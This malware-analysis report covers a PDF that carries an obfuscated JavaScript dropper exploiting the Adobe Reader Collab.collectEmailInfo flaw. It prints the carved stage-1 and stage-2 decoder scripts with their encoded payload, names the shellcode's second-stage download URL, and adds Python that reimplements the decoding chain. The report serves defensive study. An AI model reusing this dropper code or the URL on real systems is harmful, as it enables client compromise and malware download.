Malicious PDF — malware analysis report

Static analysis result for SHA-256 681b4b51695f80ab…

Verdict: MALICIOUS
File type: PDF
Size: 15.0 KB
MD5: f819b239075699bc2d623c08dc7865d5
SHA-1: 670d590afee0515edb0fb9a3b17c69a14e16bed3
SHA-256: 681b4b51695f80ab12940ab5376a98177e17911305ae8ca971717c90e1e1d15c
Risk score: 366

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution

The PDF carries obfuscated JavaScript that exploits CVE-2007-5659 (a buffer overflow in Collab.collectEmailInfo) in Adobe Reader 7.0.x before 7.1 and 8.x before 8.1.1. The script is a multi-stage dropper. Stage 1 (the /JS stream in object 5) reads a hex-dashed string from the subject of the second annotation on page 0, decodes it byte by byte with String.fromCharCode, and runs the result through app.eval, with the method name assembled one character at a time ('ev' + 'a' + 'l'); every step is gated on app.plugIns.length, so a JavaScript engine that does not model Reader's plug-in list never decodes anything. Stage 2 is a base-20 decoder (parseInt(ch, 20)) whose key is derived from the digit characters of its own source text via arguments.callee.toString(), and which takes its payload from another annotation subject when app is present; the function therefore has to run verbatim, since any edit that alters a digit in its text changes the key and yields garbage. The final decoded layer carries the Collab.collectEmailInfo trigger and %uXXXX-encoded shellcode that embeds the URL of the second-stage download. The critical heuristics and the ML classification agree on malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader reached through an over-long msg argument to Collab.collectEmailInfo(), typically after a heap spray has placed the shellcode at a predictable address; it is one of a series of Acrobat JavaScript API bugs used by the same exploit kits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The CVE trigger itself sits in the final decoded layer and is not visible to surface static analysis until that layer has been decoded.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865X9e79fb70Y41c11ea5Z0100f060 Referenced by PDF JavaScript
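
As an added illustration of the PDF_JS_SHELLCODE_DOWNLOAD_URL and EMBEDDED_URL findings, the Python below (written for this page, not part of the scanner or the kit) emulates what JavaScript unescape() does to a %uXXXX string and carves the http(s) URL back out of the resulting bytes. The shellcode bytes are constructed (a NOP sled and a few filler bytes standing in for the downloader stub); only the URL is the one reported above.

```python
import re

# URL from the EMBEDDED_URL finding above; every byte around it below is constructed.
URL = "http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865X9e79fb70Y41c11ea5Z0100f060"

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape_to_bytes(s: str) -> bytes:
    """Emulate JavaScript unescape() the way exploit shellcode relies on it.

    %uXXXX is one UTF-16 code unit and lands in memory little-endian (low byte
    first); %XX is a single byte; anything else is copied through unchanged.
    """
    out = bytearray()
    pos = 0
    for m in _ESC.finditer(s):
        out += s[pos:m.start()].encode("latin-1", "replace")
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += s[pos:].encode("latin-1", "replace")
    return bytes(out)


def to_unicode_escapes(data: bytes) -> str:
    """Inverse transform: pack bytes into %uXXXX pairs, low byte first, as kits embed strings."""
    if len(data) % 2:
        data += b"\x00"  # unescape() only yields whole 16-bit units, so pad
    return "".join("%%u%04x" % int.from_bytes(data[i:i + 2], "little")
                   for i in range(0, len(data), 2))


_URL = re.compile(rb"https?://[\x21-\x7e]+")  # stops at NUL or any non-printable


def carve_urls(blob: bytes) -> list:
    return [m.group(0).decode("ascii") for m in _URL.finditer(blob)]


# Constructed sample: NOP sled, seven filler bytes in place of the downloader stub,
# then the NUL-terminated URL, all wrapped as the kit's %u string.
SAMPLE_JS_SHELLCODE = to_unicode_escapes(
    b"\x90" * 8 + b"\xeb\x05\xe8\xfa\xff\xff\xff" + URL.encode() + b"\x00"
)


def analyse(escaped: str) -> dict:
    raw = js_unescape_to_bytes(escaped)
    return {"length": len(raw), "urls": carve_urls(raw), "nop_sled": raw.startswith(b"\x90" * 4)}


if __name__ == "__main__":
    print(analyse(SAMPLE_JS_SHELLCODE))
```

Running the decoder over the real carved JavaScript requires only the string literal passed to unescape(); the same regex will also pick up a URL that was split across several concatenated literals once they are joined, which is why the carve works on the decoded bytes rather than on the escape text.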

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: e902ccf1120d276c866fb58e8da574d7fea05f7b47cec6112ca7f6eae4d4c4c6
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1952
Size: 12129 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function mA_sp_AnC_831Ed(LB4pB_qD_3Ctv_c, o7n1tgX4T8_wgV){var Dij5pq_7f = 20;var y_q_n4_3 = 0;var eT184__c6kRJsk1 = 512;var C_48__n = Dij5pq_7f;var DqPN4_8bim = "";var a_6ACj__H3 = 4;var x7iU_Q_XC0___g = this;var l5n4__d30 = "1234ee";var V21_A1 = arguments;try {var u__fg7T = 0;if (app) {C_48__n = C_48__n + 2;o7n1tgX4T8_wgV = pr[u__fg7T].subject;}l5n4__d30 = l5n4__d30.replace(/\d+/, "call");} catch(e) { }C_48__n = C_48__n - Dij5pq_7f;var L__p__5s54o = new Array();var V_Y_xE_R0K__MH = 150;if (V_Y_xE_R0K__MH > 0) {L__p__5s54o[0] = V_Y_xE_R0K__MH;L__p__5s54o[1] = eT184__c6kRJsk1;L__p__5s54o[0] = L__p__5s54o[0] - V_Y_xE_R0K__MH;L__p__5s54o[2] = L__p__5s54o[0];L__p__5s54o[1] = L__p__5s54o[1] - eT184__c6kRJsk1;L__p__5s54o[3] = L__p__5s54o[1];}if (LB4pB_qD_3Ctv_c) { L__p__5s54o = LB4pB_qD_3Ctv_c;}if (!LB4pB_qD_3Ctv_c) {var Trp7SBHd72g = V21_A1[l5n4__d30].toString();var xclx7y18_ahNv61 = 0;var pC_pGh_k71_yu1U = xclx7y18_ahNv61;V_Y_xE_R0K__MH = V_Y_xE_R0K__MH - 102;var KQXs6TO__8613v = 0;while(pC_pGh_k71_yu1U < Trp7SBHd72g.length) {KQXs6TO__8613v = Trp7SBHd72g.charCodeAt(pC_pGh_k71_yu1U);if (KQXs6TO__8613v >= V_Y_xE_R0K__MH && KQXs6TO__8613v <= 57) {if (xclx7y18_ahNv61 == a_6ACj__H3) {xclx7y18_ahNv61 = -1;}if (xclx7y18_ahNv61 < 0) { xclx7y18_ahNv61 = 0; }L__p__5s54o[xclx7y18_ahNv61] += KQXs6TO__8613v;if (L__p__5s54o[xclx7y18_ahNv61] > eT184__c6kRJsk1) {L__p__5s54o[xclx7y18_ahNv61] -= eT184__c6kRJsk1;}xclx7y18_ahNv61 = xclx7y18_ahNv61 + 1;}pC_pGh_k71_yu1U = pC_pGh_k71_yu1U + 1;}}var e__KpT__r_4W__y = 0;var xCA_k5i1___k = 0;var n__g56D_G8pt = -1;var c_Mb0_52q = 0;var o_1_bgC7520 = 0;do {var a58Dn3 = 256;if (L__p__5s54o[c_Mb0_52q] > a58Dn3) {L__p__5s54o[c_Mb0_52q] -= a58Dn3;}c_Mb0_52q = c_Mb0_52q + 1;} while (c_Mb0_52q < a_6ACj__H3);c_Mb0_52q = c_Mb0_52q - a_6ACj__H3;while(c_Mb0_52q < o7n1tgX4T8_wgV.length) {var y44__20_L4_8_7 = o7n1tgX4T8_wgV.substr(c_Mb0_52q, 1) + ' V V ';c_Mb0_52q = c_Mb0_52q + 1;var py_ycDU_0 = parseInt(y44__20_L4_8_7, Dij5pq_7f);if (n__g56D_G8pt != -1) 
{xCA_k5i1___k += py_ycDU_0;if (e__KpT__r_4W__y == a_6ACj__H3) {e__KpT__r_4W__y = 0;}var V3Yx2Vt281 = xCA_k5i1___k;V3Yx2Vt281 = V3Yx2Vt281 - (o_1_bgC7520 + 2) * L__p__5s54o[e__KpT__r_4W__y];if (V3Yx2Vt281 <= 0) {V3Yx2Vt281 = V3Yx2Vt281 - Math.floor(V3Yx2Vt281 / 256) * 256;}V3Yx2Vt281 = String.fromCharCode(V3Yx2Vt281);if (C_48__n == 1) {DqPN4_8bim += py_ycDU_0;} else if (C_48__n == 2) {DqPN4_8bim += V3Yx2Vt281;} else {DqPN4_8bim += c_Mb0_52q;n__g56D_G8pt = -2;}n__g56D_G8pt = -1;e__KpT__r_4W__y = e__KpT__r_4W__y + 1;o_1_bgC7520 = o_1_bgC7520 + 1;} else if (n__g56D_G8pt == -1) {n__g56D_G8pt = Dij5pq_7f;xCA_k5i1___k = py_ycDU_0 * Dij5pq_7f;}}var C___S23_2IVF = this;C___S23_2IVF['ev'+'al'](DqPN4_8bim);}
	mA_sp_AnC_831Ed(0, "2a729ace7c8ic726b6ag2g5c6b3h5176c0557g632c9j25a58cae6eb4513e6g8f936b0d0g10705803a7b8712513b5a506702g424f3a497d65649cab7c09c50f617f2b3266c13d627c53a315cc071149116icd72200d3gbb0b5b6g0c12a5ce59304b2c803iab4gbf791b5h285aaf8j788c0d240g9f7g481ca3c58g8a0f9275c61h1g172h11583c3i1i0b4daf51387ia87da6b5365b6b3h717ibf3ha17g609c2bcabic67e0518c28j24a55jb818176b5j12a3b08a4d2dahb92e5a1327782b8354987hb38c89b91326ad6j4238a39g418b9i53722210c3c85hc63cc5a23hbg670d312c8c1e3iab9d8b711629bd98a35h2g81cc6g3hbg8aag9j03c7b4b1a69b534h2gb05i653152a00612bd9h445b7a44795b0a7584905f9d2e9f9fa55f842c287cc9ab2j1b0j4698582078a85h302i1cbj436g190d1jcd5g7564587h797b2fcf1d78502e3199ba6g9i7j456d1bafad001e056icd61b2b13ebb08579f024ic3b87860512jab3a8533b55d458b1g5i8d8i8f7c2j23a2be95533j0a2c455dbf508289ba2fa5110f77175j50a44i6c28446ba84198ba257h3a2g92758c76c9ai5j9200bjb68d44bb1h208a11ai2b282b42886c3i647i7d1a06b6a07558321h71c6748e5261718e72b8a30j7a892b4ba80b41b305569819b2a995410757078j4c84309c442b73433ib7bc6e793h0001a3aj552haa355156917ab47c0523030j0f5e4d512c1f8190ce5c6ha81ba41c044c4b1f7b460b64a27h5h61055i8e9h2e7227c18e999a5gb00d437b471387859d38392b8g44975b3840075d5j5h65798h3i0d1a0d647f4434720j686jad4f79aa020jc450146d3f83ba9h3j8h0h5h97c412c2c0765a3i008459ab2iba82418j579ea4817183ccbi9h7ia71546c5327h6eb5649cb3c7b0bebg00500b2g1da4779f68708jb74ebfcc25612c468d9ecf6290af565d08c4ajcf78c01j019j117h2b282b428
... (truncated)
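
The two carved scripts above read together as one decoding chain. The Python below is an added offline reproduction written for this page (not the scanner's code and not the kit's): it ports the transform of each stage as read from the carves, stage 1's hex-dashed annotation subject and stage 2's base-20 codec keyed on the digit characters of its own source text. STAGE2_FUNC and FINAL_STAGE are constructed stand-ins and the payload is built by an inline encoder, because the real stage-2 function at offset 0x1952 is truncated on this page; split_stage2 assumes the name(0, "payload") call shape shown above.

```python
import re


def decode_stage1(subject: str) -> str:
    """Stage 1 (javascript_obj0005_000.js): the annotation /Subj is a dash-separated
    hex byte list whose element 0 is a throwaway the loop skips (it starts at 1).
    Reader's String.fromCharCode("0x" + "zz") quietly yields U+0000 for a corrupt
    token; this port raises instead so a damaged carve is not mistaken for code."""
    chars = []
    for tok in subject.split("-")[1:]:
        if not re.fullmatch(r"[0-9a-fA-F]{1,4}", tok):
            raise ValueError("non-hex token in annotation subject: %r" % tok)
        chars.append(chr(int(tok, 16)))
    return "".join(chars)


def derive_key(function_source: str) -> list:
    """Stage 2 (legacy_pdfkit_stage_000.js) keys itself on arguments.callee.toString():
    the char code of every ASCII digit in the function text is added to one of four
    accumulators in turn, wrapped at 512 while summing and once more at 256 at the end.
    Any edit that changes a digit anywhere in the function changes the key."""
    key = [0, 0, 0, 0]
    n = 0
    for ch in function_source:
        code = ord(ch)
        if 48 <= code <= 57:
            key[n % 4] += code
            if key[n % 4] > 512:
                key[n % 4] -= 512
            n += 1
    return [k - 256 if k > 256 else k for k in key]


def decode_stage2(payload: str, key: list) -> str:
    """Base-20 codec (parseInt(ch, 20), alphabet 0-9a-j): two digits per byte,
    byte = d1*20 + d2 - (o+2)*key[o % 4], wrapped into 0..255 only when <= 0.
    The kit silently drops a trailing odd digit; this port rejects it."""
    if len(payload) % 2:
        raise ValueError("payload must hold an even number of base-20 digits")
    out = []
    for o in range(len(payload) // 2):
        acc = int(payload[2 * o], 20) * 20 + int(payload[2 * o + 1], 20)
        v = acc - (o + 2) * key[o % 4]
        if v <= 0:
            v %= 256  # same result as V - Math.floor(V/256)*256 for V <= 0
        out.append(chr(v))
    return "".join(out)


# Encoders exist only to build the constructed sample; the kit ships payloads pre-encoded.
_B20 = "0123456789abcdefghij"


def encode_stage2(plaintext: str, key: list) -> str:
    digits = []
    for o, ch in enumerate(plaintext):
        acc = (ord(ch) + (o + 2) * key[o % 4]) % 256
        digits.append(_B20[acc // 20] + _B20[acc % 20])
    return "".join(digits)


def encode_stage1(text: str) -> str:
    return "zz-" + "-".join("%02x" % ord(c) for c in text)


def split_stage2(js: str) -> tuple:
    """Separate the decoder function from the trailing name(0, "<payload>") call
    seen in the carve, so the key is derived from the function text alone."""
    m = re.search(r'(\w+)\(0,\s*"([0-9a-j]+)"\)\s*;?\s*$', js)
    if not m:
        raise ValueError('no stage-2 call of the form name(0, "payload") found')
    return js[:m.start()].rstrip(), m.group(2)


def run_pipeline(annotation_subject: str) -> str:
    """Annotation subject -> stage-2 JavaScript -> self-keyed final layer."""
    stage2_js = decode_stage1(annotation_subject)
    func_src, payload = split_stage2(stage2_js)
    return decode_stage2(payload, derive_key(func_src))


# Constructed stand-ins (not the sample's real text): only the digits of STAGE2_FUNC
# feed the key, and FINAL_STAGE is a placeholder for the exploit layer.
STAGE2_FUNC = "function mA_sp_AnC_831Ed(a, b){var k = 20; var m = 512; var s = '1234ee'; /* decoder body */}"
FINAL_STAGE = "Collab.collectEmailInfo({msg: sc});"
SAMPLE_SUBJECT = encode_stage1(
    STAGE2_FUNC + "\n\tmA_sp_AnC_831Ed(0, \"" + encode_stage2(FINAL_STAGE, derive_key(STAGE2_FUNC)) + "\");"
)

if __name__ == "__main__":
    print(run_pipeline(SAMPLE_SUBJECT))
```

The practical consequence of the self-keying is that the usual defanging trick (editing the eval call into a print) only works if the edit leaves every digit of the function untouched; otherwise the decoder has to be run verbatim in an emulator that supplies app, pr and the annotation subjects, or re-implemented as above with the key computed from the unmodified source.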
Filename: deobfuscated.js
SHA-256: fde1653ae41648d21815c777678e622776784d798874f29b7143b8411c33c9ba
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 76093 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)